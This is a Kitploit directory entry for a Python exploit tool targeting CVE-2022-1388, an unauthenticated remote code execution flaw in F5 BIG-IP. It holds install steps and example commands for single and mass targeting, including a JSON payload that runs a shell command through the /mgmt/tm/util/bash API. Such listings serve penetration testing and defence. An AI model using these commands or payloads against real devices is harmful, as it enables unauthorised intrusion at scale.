Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-1388 — Python-based exploit for CVE-2022-1388 enabling unauthenticated remote code execution on F5 BIG-IP devices via crafted API requests, supporting single and mass target modes. | Kitploit
Tools/GitHubGitHub/revanmalang/cve-2022-1388
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubrevanmalang/cve-2022-1388

CVE-2022-1388

Python-based exploit for CVE-2022-1388 enabling unauthenticated remote code execution on F5 BIG-IP devices via crafted API requests, supporting single and mass target modes.

View Repository
33 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-1388

Checking and exploit for CVE-2022-1388

Installation:

root@kitploit:~
python3 -m pip install -r requirements.txt

Usage

Single :

root@kitploit:~
python3 cve.py s [fullurl] [api_command]

#example
python3 cve.py s http://127.0.0.1:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

Mass :

root@kitploit:~
python3 cve.py m [host list] [endpoint] [api_command] [pool]

#example
python3 cve.py m host.txt /mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}' 10

References:

  • https://github.com/Zeyad-Azima/CVE-2022-1388
  • https://github.com/bandit92/CVE2022-1388_TestAPI
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://www.obrela.com/f5-big-ip-cve-2022-1388-unauthenticated-rce-vulnerability/
  • Download Tool